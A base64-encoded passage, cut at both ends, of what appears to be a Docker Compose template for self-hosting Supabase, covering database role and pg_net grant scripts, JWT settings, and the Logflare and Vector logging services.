1pc3NpbmcnO1xuICAgIEVORCBJRjtcblxuICAgIElGIG1ldGhvZCBJUyBOVUxMIE9SIG1ldGhvZCA9ICdudWxsJyBUSEVOXG4gICAgICBSQUlTRSBFWENFUFRJT04gJ21ldGhvZCBhcmd1bWVudCBpcyBtaXNzaW5nJztcbiAgICBFTkQgSUY7XG5cbiAgICBJRiBUR19BUkdWWzJdIElTIE5VTEwgT1IgVEdfQVJHVlsyXSA9ICdudWxsJyBUSEVOXG4gICAgICBoZWFkZXJzID0gJ3tcIkNvbnRlbnQtVHlwZVwiOiBcImFwcGxpY2F0aW9uL2pzb25cIn0nOjpqc29uYjtcbiAgICBFTFNFXG4gICAgICBoZWFkZXJzID0gVEdfQVJHVlsyXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVlszXSBJUyBOVUxMIE9SIFRHX0FSR1ZbM10gPSAnbnVsbCcgVEhFTlxuICAgICAgcGFyYW1zID0gJ3t9Jzo6anNvbmI7XG4gICAgRUxTRVxuICAgICAgcGFyYW1zID0gVEdfQVJHVlszXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVls0XSBJUyBOVUxMIE9SIFRHX0FSR1ZbNF0gPSAnbnVsbCcgVEhFTlxuICAgICAgdGltZW91dF9tcyA9IDEwMDA7XG4gICAgRUxTRVxuICAgICAgdGltZW91dF9tcyA9IFRHX0FSR1ZbNF06OmludGVnZXI7XG4gICAgRU5EIElGO1xuXG4gICAgQ0FTRVxuICAgICAgV0hFTiBtZXRob2QgPSAnR0VUJyBUSEVOXG4gICAgICAgIFNFTEVDVCBodHRwX2dldCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9nZXQoXG4gICAgICAgICAgdXJsLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIFdIRU4gbWV0aG9kID0gJ1BPU1QnIFRIRU5cbiAgICAgICAgcGF5bG9hZCA9IGpzb25iX2J1aWxkX29iamVjdChcbiAgICAgICAgICAnb2xkX3JlY29yZCcsIE9MRCxcbiAgICAgICAgICAncmVjb3JkJywgTkVXLFxuICAgICAgICAgICd0eXBlJywgVEdfT1AsXG4gICAgICAgICAgJ3RhYmxlJywgVEdfVEFCTEVfTkFNRSxcbiAgICAgICAgICAnc2NoZW1hJywgVEdfVEFCTEVfU0NIRU1BXG4gICAgICAgICk7XG5cbiAgICAgICAgU0VMRUNUIGh0dHBfcG9zdCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9wb3N0KFxuICAgICAgICAgIHVybCxcbiAgICAgICAgICBwYXlsb2FkLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIEVMU0VcbiAgICAgICAgUkFJU0UgRVhDRVBUSU9OICdtZXRob2QgYXJndW1lbnQgJSBpcyBpbnZhbGlkJywgbWV0aG9kO1xuICAgIEVORCBDQVNFO1xuXG4gICAgSU5TRVJUIElOVE8gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzXG4gICAgICAoaG9va190YWJsZV9pZCwgaG9va19uYW1lLCByZXF1ZXN0X2lkKVxuICAgIFZBTFVFU1xuICAgICAgKFRHX1JFTElELCBUR19OQU1FLCByZXF1ZXN0X2lkKTtcblxuICAgIFJFVFVSTiBORVc7XG4gIEVORFxuJGZ1bmN0aW9uJDtcbi0tIFN1cGFiYXNlIHN1cGVyIGFkbWluXG5ET1xuJCRcbkJFR0lOXG4gIElGIE5PVCBFWElTVFMgKFxuICAgIFNFTEVDVCAxXG4gICAgRlJPTSBwZ19yb2xlc1xuICAgIFdIRVJFIHJvbG5hbWUgPSAnc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluJ1xuICApXG4gIFRIRU5cbiAgICBDUkVBVEUgVVNFUiBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gTk9JTkhFUklUIENSRUFURVJPTEUgTE9HSU4gTk9SRVBMSUNBVElPTjtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIFNDSEVNQSBzdXBhYmFzZV9mdW5jdGlvbnMgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuR1JBTlQgQUxMIFBSSVZJTEVHRVMgT04gQUxMIFRBQkxFUyBJTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIEFMTCBTRVFVRU5DRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5BTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBTRVQgc2VhcmNoX3BhdGggPSBcInN1cGFiYXNlX2Z1bmN0aW9uc1wiO1xuQUxURVIgdGFibGUgXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5taWdyYXRpb25zIE9XTkVSIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkFMVEVSIHRhYmxlIFwic3VwYWJhc2VfZnVuY3Rpb25zXCIuaG9va3MgT1dORVIgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuQUxURVIgZnVuY3Rpb24gXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5odHRwX3JlcXVlc3QoKSBPV05FUiBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5HUkFOVCBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gVE8gcG9zdGdyZXM7XG4tLSBSZW1vdmUgdW51c2VkIHN1cGFiYXNlX3BnX25ldF9hZG1pbiByb2xlXG5ET1xuJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX3JvbGVzXG4gICAgV0hFUkUgcm9sbmFtZSA9ICdzdXBhYmFzZV9wZ19uZXRfYWRtaW4nXG4gIClcbiAgVEhFTlxuICAgIFJFQVNTSUdOIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbiBUTyBzdXBhYmFzZV9hZG1pbjtcbiAgICBEUk9QIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbjtcbiAgICBEUk9QIFJPTEUgc3VwYWJhc2VfcGdfbmV0X2FkbWluO1xuICBFTkQgSUY7XG5FTkRcbiQkO1xuLS0gcGdfbmV0IGdyYW50cyB3aGVuIGV4dGVuc2lvbiBpcyBhbHJlYWR5IGVuYWJsZWRcbkRPXG4kJFxuQkVHSU5cbiAgSUYgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXh0ZW5zaW9uXG4gICAgV0hFUkUgZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbi0tIEV2ZW50IHRyaWdnZXIgZm9yIHBnX25ldFxuQ1JFQVRFIE9SIFJFUExBQ0UgRlVOQ1RJT04gZXh0ZW5zaW9ucy5ncmFudF9wZ19uZXRfYWNjZXNzKClcblJFVFVSTlMgZXZlbnRfdHJpZ2dlclxuTEFOR1VBR0UgcGxwZ3NxbFxuQVMgJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX2V2ZW50X3RyaWdnZXJfZGRsX2NvbW1hbmRzKCkgQVMgZXZcbiAgICBKT0lOIHBnX2V4dGVuc2lvbiBBUyBleHRcbiAgICBPTiBldi5vYmppZCA9IGV4dC5vaWRcbiAgICBXSEVSRSBleHQuZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EO1xuJCQ7XG5DT01NRU5UIE9OIEZVTkNUSU9OIGV4dGVuc2lvbnMuZ3JhbnRfcGdfbmV0X2FjY2VzcyBJUyAnR3JhbnRzIGFjY2VzcyB0byBwZ19uZXQnO1xuRE9cbiQkXG5CRUdJTlxuICBJRiBOT1QgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXZlbnRfdHJpZ2dlclxuICAgIFdIRVJFIGV2dG5hbWUgPSAnaXNzdWVfcGdfbmV0X2FjY2VzcydcbiAgKSBUSEVOXG4gICAgQ1JFQVRFIEVWRU5UIFRSSUdHRVIgaXNzdWVfcGdfbmV0X2FjY2VzcyBPTiBkZGxfY29tbWFuZF9lbmQgV0hFTiBUQUcgSU4gKCdDUkVBVEUgRVhURU5TSU9OJylcbiAgICBFWEVDVVRFIFBST0NFRFVSRSBleHRlbnNpb25zLmdyYW50X3BnX25ldF9hY2Nlc3MoKTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCcyMDIxMDgwOTE4MzQyM191cGRhdGVfZ3JhbnRzJyk7XG5BTFRFUiBmdW5jdGlvbiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KCkgU0VDVVJJVFkgREVGSU5FUjtcbkFMVEVSIGZ1bmN0aW9uIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3QoKSBTRVQgc2VhcmNoX3BhdGggPSBzdXBhYmFzZV9mdW5jdGlvbnM7XG5SRVZPS0UgQUxMIE9OIEZVTkNUSU9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3QoKSBGUk9NIFBVQkxJQztcbkdSQU5UIEVYRUNVVEUgT04gRlVOQ1RJT04gc3VwYWJhc2VfZnVuY3Rpb25zLmh0dHBfcmVxdWVzdCgpIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5DT01NSVQ7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcm9sZXMuc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk5LXJvbGVzLnNxbAogICAgICAgIGNvbnRlbnQ6ICItLSBOT1RFOiBjaGFuZ2UgdG8geW91ciBvd24gcGFzc3dvcmRzIGZvciBwcm9kdWN0aW9uIGVudmlyb25tZW50c1xuIFxcc2V0IHBncGFzcyBgZWNobyBcIiRQT1NUR1JFU19QQVNTV09SRFwiYFxuXG4gQUxURVIgVVNFUiBhdXRoZW50aWNhdG9yIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgcGdib3VuY2VyIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgc3VwYWJhc2VfYXV0aF9hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX3N0b3JhZ2VfYWRtaW4gV0lUSCBQQVNTV09SRCA6J3BncGFzcyc7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvand0LnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL2luaXQtc2NyaXB0cy85OS1qd3Quc3FsCiAgICAgICAgY29udGVudDogIlxcc2V0IGp3dF9zZWNyZXQgYGVjaG8gXCIkSldUX1NFQ1JFVFwiYFxuXFxzZXQgand0X2V4cCBgZWNobyBcIiRKV1RfRVhQXCJgXG5cXHNldCBkYl9uYW1lIGBlY2hvIFwiJHtQT1NUR1JFU19EQjotcG9zdGdyZXN9XCJgXG5cbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3Rfc2VjcmV0XCIgVE8gOidqd3Rfc2VjcmV0JztcbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3RfZXhwXCIgVE8gOidqd3RfZXhwJztcbiIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9sb2dzLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktbG9ncy5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwic3VwYWJhc2VfYWRtaW5cImBcblxcYyBfc3VwYWJhc2VcbmNyZWF0ZSBzY2hlbWEgaWYgbm90IGV4aXN0cyBfYW5hbHl0aWNzO1xuYWx0ZXIgc2NoZW1hIF9hbmFseXRpY3Mgb3duZXIgdG8gOnBndXNlcjtcblxcYyBwb3N0Z3Jlc1xuIgogICAgICAtICdzdXBhYmFzZS1kYi1jb25maWc6L2V0Yy9wb3N0Z3Jlc3FsLWN1c3RvbScKICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICBpbWFnZTogJ3N1cGFiYXNlL2xvZ2ZsYXJlOjEuNC4wJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjQwMDAvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMT0dGTEFSRV9OT0RFX0hPU1Q9MTI3LjAuMC4xCiAgICAgIC0gREJfVVNFUk5BTUU9c3VwYWJhc2VfYWRtaW4KICAgICAgLSBEQl9EQVRBQkFTRT1fc3VwYWJhc2UKICAgICAgLSAnREJfSE9TVE5BTUU9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdEQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gREJfU0NIRU1BPV9hbmFseXRpY3MKICAgICAgLSAnTE9HRkxBUkVfQVBJX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfTE9HRkxBUkV9JwogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlQ9dHJ1ZQogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlRfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfU1VQQUJBU0VfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfTUlOX0NMVVNURVJfU0laRT0xCiAgICAgIC0gJ1BPU1RHUkVTX0JBQ0tFTkRfVVJMPXBvc3RncmVzcWw6Ly9zdXBhYmFzZV9hZG1pbjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9L19zdXBhYmFzZScKICAgICAgLSBQT1NUR1JFU19CQUNLRU5EX1NDSEVNQT1fYW5hbHl0aWNzCiAgICAgIC0gTE9HRkxBUkVfRkVBVFVSRV9GTEFHX09WRVJSSURFPW11bHRpYmFja2VuZD10cnVlCiAgc3VwYWJhc2UtdmVjdG9yOgogICAgaW1hZ2U6ICd0aW1iZXJpby92ZWN0b3I6MC4yOC4xLWFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vc3VwYWJhc2UtdmVjdG9yOjkwMDEvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgdm9sdW1lczoKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9sb2dzL3ZlY3Rvci55bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvdmVjdG9yL3ZlY3Rvci55bWwKICAgICAgICByZWFkX29ubHk6IHRydWUKICAgICAgICBjb250ZW50OiAiYXBpOlxuICBlbmFibGVkOiB0cnVlXG4gIGFkZHJlc3M6IDAuMC4wLjA6OTAwMVxuXG5zb3VyY2VzOlxuICBkb2NrZXJfaG9zdDpcbiAgICB0eXBlOiBkb2NrZXJfbG9nc1xuICAgIGV4Y2x1ZGVfY29udGFpbmVyczpcbiAgICAgIC0gc3VwYWJhc2UtdmVjdG9yXG5cbnRyYW5zZm9ybXM6XG4gIHByb2plY3RfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gZG9ja2VyX2hvc3RcbiAgICBzb3VyY2U6IHwtXG4gICAgICAucHJvamVjdCA9IFwiZGVmYXVsdFwiXG4gICAgICAuZXZlbnRfbWVzc2FnZSA9IGRlbCgubWVzc2FnZSlcbiAgICAgIC5hcHBuYW1lID0gZGVsKC5jb250YWluZXJfbmFtZSlcbiAgICAgIGRlbCguY29udGFpbmVyX2NyZWF0ZWRfYXQpXG4gICAgICBkZWwoLmNvbnRhaW5lcl9pZClcbiAgICAgIGRlbCguc291cmNlX3R5cGUpXG4gICAgICBkZWwoLnN0cmVhbSlcbiAgICAgIGRlbCgubGFiZWwpXG4gICAgICBkZWwoLmltYWdlKVxuICAgICAgZGVsKC5ob3N0KVxuICAgICAgZGVsKC5zdHJlYW0pXG4gIHJvdXRlcjpcbiAgICB0eXBlOiByb3V0ZVxuICAgIGlucHV0czpcbiAgICAgIC0gcHJvamVjdF9sb2dzXG4gICAgcm91dGU6XG4gICAgICBrb25nOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2Uta29uZ1wiKSdcbiAgICAgIGF1dGg6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1hdXRoXCIpJ1xuICAgICAgcmVzdDogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInN1cGFiYXNlLXJlc3RcIiknXG4gICAgICByZWFsdGltZTogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInJlYWx0aW1lLWRldlwiKSdcbiAgICAgIHN0b3JhZ2U6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1zdG9yYWdlXCIpJ1xuICAgICAgZnVuY3Rpb25zOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2UtZnVuY3Rpb25zXCIpJ1xuICAgICAgZGI6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1kYlwiKSdcbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5rb25nXG4gICAgc291cmNlOiB8LVxuICAgICAgcmVxLCBlcnIgPSBwYXJzZV9uZ2lueF9sb2coLmV2ZW50X21lc3NhZ2UsIFwiY29tYmluZWRcIilcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAudGltZXN0YW1wID0gcmVxLnRpbWVzdGFtcFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0LmhlYWRlcnMucmVmZXJlciA9IHJlcS5yZWZlcmVyXG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy51c2VyX2FnZW50ID0gcmVxLmFnZW50XG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy5jZl9jb25uZWN0aW5nX2lwID0gcmVxLmNsaWVudFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0Lm1ldGhvZCA9IHJlcS5tZXRob2RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wYXRoID0gcmVxLnBhdGhcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHJlcS5wcm90b2NvbFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXNwb25zZS5zdGF0dXNfY29kZSA9IHJlcS5zdGF0dXNcbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2VycjpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmtvbmdcbiAgICBzb3VyY2U6IHwtXG4gICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSBcIkdFVFwiXG4gICAgICAubWV0YWRhdGEucmVzcG9uc2Uuc3RhdHVzX2NvZGUgPSAyMDBcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfbmdpbnhfbG9nKC5ldmVudF9tZXNzYWdlLCBcImVycm9yXCIpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lc3RhbXBcbiAgICAgICAgICAuc2V2ZXJpdHkgPSBwYXJzZWQuc2V2ZXJpdHlcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5ob3N0ID0gcGFyc2VkLmhvc3RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5oZWFkZXJzLmNmX2Nvbm5lY3RpbmdfaXAgPSBwYXJzZWQuY2xpZW50XG4gICAgICAgICAgdXJsLCBlcnIgPSBzcGxpdChwYXJzZWQucmVxdWVzdCwgXCIgXCIpXG4gICAgICAgICAgaWYgZXJyID09IG51bGwge1xuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSB1cmxbMF1cbiAgICAgICAgI